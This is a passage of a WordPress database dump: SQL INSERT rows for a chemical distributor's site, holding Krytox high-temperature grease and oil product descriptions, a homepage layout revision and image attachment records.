°F), many alloy steels, stainless steels, and other metals, such as aluminum alloy, titanium alloy, nickel alloy, and cobalt alloy, can be used with Krytox lubricants.', 'XHT-AC', 'Krytox XHT-AC and XHT-ACX greases are special high temperature greases with low oil evaporation that provide anti-wear and rusting protection, and are compatible with all elastomers and plastics. These greases have excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400 °F). Krytox XHT-AC series greases are nonflammable, oxygen-compatible, and chemically inert. Krytox greases provide extended lubrication intervals and longer equipment life.\r\n\r\nLowest viscosity grease in the XHT-AC series.\r\n\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-xht-ac', '', '', '2016-10-07 17:50:05', '2016-10-07 17:50:05', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=672', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (673, 1, '2016-08-23 12:39:08', '2016-08-23 12:39:08', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™<BR>&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS<BR>&amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY<BR>&amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL<BR>CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO<br>RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-23 12:39:08', '2016-08-23 12:39:08', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (674, 2, '2016-08-23 12:50:50', '2016-08-23 12:50:50', 'Krytox XHT-ACX grease is a special high temperature greases with low oil evaporation that provide anti-wear and rusting protection, and are compatible with all elastomers and plastics. These greases have excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400°F). Krytox XHT AC series greases are nonflammable, oxygen-compatible, and chemically inert. Krytox greases provide extended lubrication intervals and longer equipment life.\r\n\r\nThe Krytox XHT-ACX series greases are an extension of the Krytox 240 series and Krytox GPL 22X series, but are designed to give higher performance in the 204–302°C (400–575 °F) range. Krytox XHT-AC series greases contain sodium nitrite to offer anti-corrosion performance. These greases should be used below 320 °C (608 °F), where the polytetrafluoroethylene (PTFE) thickener could begin to melt. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox grease is made to a standard NLGI grade 2. PTFE is the standard thickener.\r\n\r\nApplications for these lubricants are generally of a critical nature, such as when temperatures reach extremes that conventional lubricants cannot handle. Krytox XHT-AC and XHT-ACX greases are expected to be durable in highly aggressive environments. Where failure of components is not an option, because of durability, warranty, safety, loss of productivity, or downtime, Krytox lubricants are the ideal choice in a wide range of industries and applications.\r\n\r\n<strong>Compatibility with Metals</strong>\r\nBecause of their low surface tensions, Krytox lubricants easily wet metallic surfaces. Krytox lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 °F). Above 288 °C (550 °F), many alloy steels, stainless steels, and other metals, such as aluminum alloy, titanium alloy, nickel alloy, and cobalt alloy, can be used with Krytox lubricants.\r\n', 'XHT-ACX', 'Applications for these lubricants are generally of a critical nature, such as when temperatures reach extremes that conventional lubricants cannot handle. Krytox XHT-AC and XHT-ACX greases are expected to be durable in highly aggressive environments. Where failure of components is not an option, because of durability, warranty, safety, loss of productivity, or downtime, Krytox lubricants are the ideal choice in a wide range of industries and applications.\r\n<br /><br />\r\nHighest viscosity grease in the XHT-AC series. \r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-xht-acx', '', '', '2016-10-05 17:37:01', '2016-10-05 17:37:01', '', 0, 'https://132.148.10.86/wordpress/product/xht-acx/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (675, 2, '2016-08-23 13:11:33', '2016-08-23 13:11:33', '<strong>Krytox XHT-BD</strong>\r\nKrytox XHT-BD series oils are special extreme high temperature greases with low oil evaporation that are thickened with a non-melting thickener to allow use at temperatures above the melting point of common greases. They have excellent lubrication over a broad temperature range. Krytox XHT-BD series greases are nonflammable and chemically inert. Krytox allows extended lubrication intervals and longer equipment life.\r\n\r\nKrytox XHT-BD greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox XHT-BD greases are for use in low speed bearings or in pillow housings and will shear at high speeds, causing loss of oil in sealed bearings. The oil in the grease can begin to slowly evaporate at temperatures above 330 °C (626 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life.\r\n\r\n<strong>Compatibility with Metals</strong>\r\nDue to their low surface tensions, Krytox oils easily wet metallic surfaces; and, because of their inertness, Krytox oils have little or no adverse effect on metals. Testing of metals at 340 °C (644 °F) in the absence of air has shown little evidence of corrosion. In the presence of air, corrosion was slightly higher. The presence of molybdenum in the metals improved corrosion resistance.\r\n\r\nBecause of its thermal stability and non-oxidizing characteristics, Krytox is a natural high-temperature lubricant. Krytox XHT greases are available with useful temperature ranges up to 360 °C (680 °F) for continuous use, with spikes to 400 °C (752 °F), when used in proper metallurgy with periodic re-lubrication.', 'XHT-BD', 'Krytox XHT-BD greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener.\r\n<br /><br />\r\nLowest viscosity grease in the XHT-BD Series.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-xht-bd', '', '', '2016-10-10 12:54:54', '2016-10-10 12:54:54', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=675', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (676, 2, '2016-08-23 13:48:57', '2016-08-23 13:48:57', '', 'krytox-automotive-grease-oil-pfpe-ptfe', '', 'inherit', 'open', 'closed', '', 'shutterstock_56435803', '', '', '2016-08-23 16:54:45', '2016-08-23 16:54:45', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_56435803.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (677, 2, '2016-08-23 13:49:08', '2016-08-23 13:49:08', '', 'krytox-gpl-grease-ptfe-pfpe-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_67406404', '', '', '2016-08-23 16:54:56', '2016-08-23 16:54:56', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_67406404.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (678, 2, '2016-08-23 13:49:20', '2016-08-23 13:49:20', '', 'krytox-automotive-grease-oil-pfpe-ptfe', '', 'inherit', 'open', 'closed', '', 'shutterstock_90355954', '', '', '2016-08-23 16:54:42', '2016-08-23 16:54:42', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_90355954.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (679, 2, '2016-08-23 13:49:34', '2016-08-23 13:49:34', '', 'krytox-automotive-grease-oil-pfpe-ptfe', '', 'inherit', 'open', 'closed', '', 'shutterstock_100205036', '', '', '2016-08-23 16:54:38', '2016-08-23 16:54:38', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_100205036.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (680, 2, '2016-08-23 13:49:46', '2016-08-23 13:49:46', '', 'krytox-gpl-grease-ptfe-pfpe-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_120161290', '', '', '2016-08-23 16:45:30', '2016-08-23 16:45:30', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_120161290.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (681, 2, '2016-08-23 13:49:56', '2016-08-23 13:49:56', '', 'krytox-gpl-grease-ptfe-pfpe-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_127449692', '', '', '2016-08-23 16:54:58', '2016-08-23 16:54:58', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_127449692.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (682, 2, '2016-08-23 13:50:07', '2016-08-23 13:50:07', '', 'krytox-gpl-grease-ptfe-pfpe-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_127449698', '', '', '2016-08-23 16:55:00', '2016-08-23 16:55:00', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_127449698.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (683, 2, '2016-08-23 13:50:17', '2016-08-23 13:50:17', '', 'Krytox GPL 200', '', 'inherit', 'open', 'closed', '', 'shutterstock_153282266', '', '', '2016-10-04 13:33:24', '2016-10-04 13:33:24', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_153282266.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (684, 2, '2016-08-23 13:50:36', '2016-08-23 13:50:36', '', 'krytox-bearing-grease-oil-pfpe-ptfe', '', 'inherit', 'open', 'closed', '', 'shutterstock_158212538', '', '', '2016-08-23 16:54:07', '2016-08-23 16:54:07', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_158212538.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (685, 2, '2016-08-23 13:50:59', '2016-08-23 13:50:59', '', 'Krytox 250AZ', '', 'inherit', 'open', 'closed', '', 'shutterstock_178012379', '', '', '2016-09-27 22:31:44', '2016-09-27 22:31:44', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_178012379.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (686, 2, '2016-08-23 13:51:11', '2016-08-23 13:51:11', '', 'Krytox AUT 2A45', '', 'inherit', 'open', 'closed', '', 'shutterstock_194255531', '', '', '2016-10-03 14:38:12', '2016-10-03 14:38:12', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_194255531.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (687, 2, '2016-08-23 13:51:24', '2016-08-23 13:51:24', '', 'krytox-xht-high-temperature-grease-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_207817831', '', '', '2016-08-23 16:52:26', '2016-08-23 16:52:26', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_207817831.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (688, 2, '2016-08-23 13:51:35', '2016-08-23 13:51:35', '', 'krytox-xht-high-temperature-grease-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_207863086', '', '', '2016-08-23 16:52:28', '2016-08-23 16:52:28', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_207863086.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (689, 2, '2016-08-23 13:51:56', '2016-08-23 13:51:56', '', 'krytox-xht-high-temperature-grease-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_209111524', '', '', '2016-08-23 16:52:30', '2016-08-23 16:52:30', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_209111524.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (690, 2, '2016-08-23 13:52:15', '2016-08-23 13:52:15', '', 'krytox-aerospace-grease-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_255838942', '', '', '2016-08-23 16:55:27', '2016-08-23 16:55:27', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_255838942.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (691, 2, '2016-08-23 13:52:24', '2016-08-23 13:52:24', '', 'krytox-aerospace-grease-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_268355474', '', '', '2016-08-23 16:55:24', '2016-08-23 16:55:24', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_268355474.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (692, 2, '2016-08-23 13:52:37', '2016-08-23 13:52:37', '', 'Krytox GPL 227', '', 'inherit', 'open', 'closed', '', 'shutterstock_316632911', '', '', '2016-09-27 20:07:39', '2016-09-27 20:07:39', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_316632911.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (693, 2, '2016-08-23 13:52:49', '2016-08-23 13:52:49', '', 'Krytox AUT 2245', '', 'inherit', 'open', 'closed', '', 'shutterstock_336316772', '', '', '2016-10-03 13:14:18', '2016-10-03 13:14:18', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_336316772.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (694, 2, '2016-08-23 13:53:01', '2016-08-23 13:53:01', '', 'Krytox AUT 2045', '', 'inherit', 'open', 'closed', '', 'shutterstock_437367067', '', '', '2016-10-03 12:10:04', '2016-10-03 12:10:04', '', 675, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_437367067.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (696, 2, '2016-08-23 14:09:11', '2016-08-23 14:09:11', '<strong>Krytox XHT-BDZ</strong>\r\nKrytox XHT-BDZ series oils are special extreme high temperature greases with low oil evaporation that are thickened with a non-melting thickener to allow use at temperatures above the melting point of common greases. They have excellent lubrication over a broad temperature range. Krytox XHT-BDZ series greases are nonflammable and chemically inert. Krytox allows extended lubrication intervals and longer equipment life.\r\n\r\nKrytox XHT-BDZ greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox XHT-BDZ greases are for use in low speed bearings or in pillow housings and will shear at high speeds, causing loss of oil in sealed bearings. The oil in the grease can begin to slowly evaporate at temperatures above 330 °C (626 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life.\r\n\r\n<strong>Compatibility with Metals</strong>\r\nDue to their low surface tensions, Krytox oils easily wet metallic surfaces; and, because of their inertness, Krytox oils have little or no adverse effect on metals. Testing of metals at 340 °C (644 °F) in the absence of air has shown little evidence of corrosion. In the presence of air, corrosion was slightly higher. The presence of molybdenum in the metals improved corrosion resistance.\r\n\r\nBecause of its thermal stability and non-oxidizing characteristics, Krytox is a natural high-temperature lubricant. Krytox XHT greases are available with useful temperature ranges up to 360 °C (680 °F) for continuous use, with spikes to 400 °C (752 °F), when used in proper metallurgy with periodic re-lubrication.\r\n', 'XHT-BDZ', 'Krytox XHT-BD greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener. \r\n<br /><br />\r\nHighest viscosity grease in the XHT-BD Series.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-xht-bdz', '', '', '2016-10-05 18:04:09', '2016-10-05 18:04:09', '', 0, 'https://132.148.10.86/wordpress/product/xht-bdz/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (697, 2, '2016-08-23 14:10:16', '2016-08-23 14:10:16', '<strong>Krytox XHT-BDX</strong>\r\nKrytox XHT-BDX series oils are special extreme high temperature greases with low oil evaporation that are thickened with a non-melting thickener to allow use at temperatures above the melting point of common greases. They have excellent lubrication over a broad temperature range. Krytox XHT-BDX series greases are nonflammable and chemically inert. Krytox allows extended lubrication intervals and longer equipment life.\r\n\r\nKrytox XHT-BDX greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox XHT-BDX greases are for use in low speed bearings or in pillow housings and will shear at high speeds, causing loss of oil in sealed bearings. The oil in the grease can begin to slowly evaporate at temperatures above 330 °C (626 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life.\r\n\r\n<strong>Compatibility with Metals</strong>\r\nDue to their low surface tensions, Krytox oils easily wet metallic surfaces; and, because of their inertness, Krytox oils have little or no adverse effect on metals. Testing of metals at 340 °C (644 °F) in the absence of air has shown little evidence of corrosion. In the presence of air, corrosion was slightly higher. The presence of molybdenum in the metals improved corrosion resistance.\r\n\r\nBecause of its thermal stability and non-oxidizing characteristics, Krytox is a natural high-temperature lubricant. Krytox XHT greases are available with useful temperature ranges up to 360 °C (680 °F) for continuous use, with spikes to 400 °C (752 °F), when used in proper metallurgy with periodic re-lubrication.', 'XHT-BDX', 'Krytox XHT-BD greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener. \r\n<br /><br />\r\nThis grease has a mid-range viscosity. \r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />\r\n', 'publish', 'open', 'closed', '', 'krytox-xht-bdx', '', '', '2016-10-05 18:02:23', '2016-10-05 18:02:23', '', 0, 'https://132.148.10.86/wordpress/product/xht-bdx/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (698, 2, '2016-08-23 14:20:09', '2016-08-23 14:20:09', '', 'shutterstock_99487787', '', 'inherit', 'open', 'closed', '', 'shutterstock_99487787', '', '', '2016-08-23 14:20:09', '2016-08-23 14:20:09', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_99487787.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (699, 2, '2016-08-23 14:20:20', '2016-08-23 14:20:20', '', 'Krytox GPL 223', '', 'inherit', 'open', 'closed', '', 'shutterstock_157239284', '', '', '2016-09-27 19:54:42', '2016-09-27 19:54:42', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_157239284.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (700, 2, '2016-08-23 14:20:32', '2016-08-23 14:20:32', '', 'Krytox GPL 220', '', 'inherit', 'open', 'closed', '', 'shutterstock_180156275', '', '', '2016-09-27 19:50:15', '2016-09-27 19:50:15', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_180156275.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (701, 2, '2016-08-23 14:20:43', '2016-08-23 14:20:43', '', 'krytox-bearing-grease-oil-pfpe-ptfe', '', 'inherit', 'open', 'closed', '', 'shutterstock_236942140', '', '', '2016-08-23 16:54:12', '2016-08-23 16:54:12', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_236942140.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (702, 2, '2016-08-23 14:20:54', '2016-08-23 14:20:54', '', 'krytox-bearing-grease-oil-pfpe-ptfe', '', 'inherit', 'open', 'closed', '', 'shutterstock_291106055', '', '', '2016-08-23 16:54:14', '2016-08-23 16:54:14', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_291106055.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (703, 2, '2016-08-23 14:21:05', '2016-08-23 14:21:05', '', 'Krytox GPL 222', '', 'inherit', 'open', 'closed', '', 'shutterstock_313168337', '', '', '2016-09-27 19:53:04', '2016-09-27 19:53:04', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_313168337.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (704, 2, '2016-08-23 14:21:24', '2016-08-23 14:21:24', '', 'krytox-bearing-grease-oil-pfpe-ptfe', '', 'inherit', 'open', 'closed', '', 'shutterstock_387235993', '', '', '2016-08-23 16:54:19', '2016-08-23 16:54:19', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_387235993.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (705, 2, '2016-08-23 14:21:38', '2016-08-23 14:21:38', '', 'krytox-bearing-grease-oil-pfpe-ptfe', '', 'inherit', 'open', 'closed', '', 'shutterstock_424050661', '', '', '2016-08-23 16:54:21', '2016-08-23 16:54:21', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_424050661.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (706, 2, '2016-08-23 14:21:55', '2016-08-23 14:21:55', '', 'krytox-automotive-grease-oil-pfpe-ptfe', '', 'inherit', 'open', 'closed', '', 'shutterstock_429781711', '', '', '2016-08-23 16:54:34', '2016-08-23 16:54:34', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_429781711.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (707, 2, '2016-08-23 14:58:53', '2016-08-23 14:58:53', '', 'XHT-500', 'Krytox XHT oils allow extended lubrication intervals and longer equipment life. The oil can begin to slowly evaporate at temperatures above 330 °C (626 °F), and this will occur at an increasing rate as temperatures increase. Relubrication could be required at these temperatures to achieve optimum life.\r\n<br /><br />\r\nLowest viscosity XHT oil. ', 'publish', 'open', 'closed', '', 'xht-500', '', '', '2016-09-13 14:35:35', '2016-09-13 14:35:35', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=707', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (708, 2, '2016-08-23 14:59:29', '2016-08-23 14:59:29', '', 'XHT-1000', 'Krytox XHT oils allow extended lubrication intervals and longer equipment life. The oil can begin to slowly evaporate at temperatures above 330 °C (626 °F), and this will occur at an increasing rate as temperatures increase. Relubrication could be required at these temperatures to achieve optimum life.\r\n<br /><br />\r\nHighest viscosity XHT oil. ', 'publish', 'open', 'closed', '', 'xht-1000', '', '', '2016-09-13 14:32:29', '2016-09-13 14:32:29', '', 0, 'https://132.148.10.86/wordpress/product/xht-1000/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (709, 2, '2016-08-23 15:01:09', '2016-08-23 15:01:09', '', 'krytox-pfpe-ptfe-grease-oil-aerospace', '', 'inherit', 'open', 'closed', '', 'shutterstock_76083631', '', '', '2016-08-23 16:52:58', '2016-08-23 16:52:58', '', 708, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_76083631.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (711, 2, '2016-08-23 15:01:37', '2016-08-23 15:01:37', '', 'krytox-xht-high-temperature-grease-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_205346470', '', '', '2016-08-23 16:52:46', '2016-08-23 16:52:46', '', 708, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_205346470.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (712, 2, '2016-08-23 15:01:45', '2016-08-23 15:01:45', '', 'krytox-pfpe-ptfe-grease-oil-aerospace', '', 'inherit', 'open', 'closed', '', 'shutterstock_354196970', '', '', '2016-08-23 16:52:53', '2016-08-23 16:52:53', '', 708, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_354196970.jpg', 0, 'attachment', 'image/jpeg', 0); 
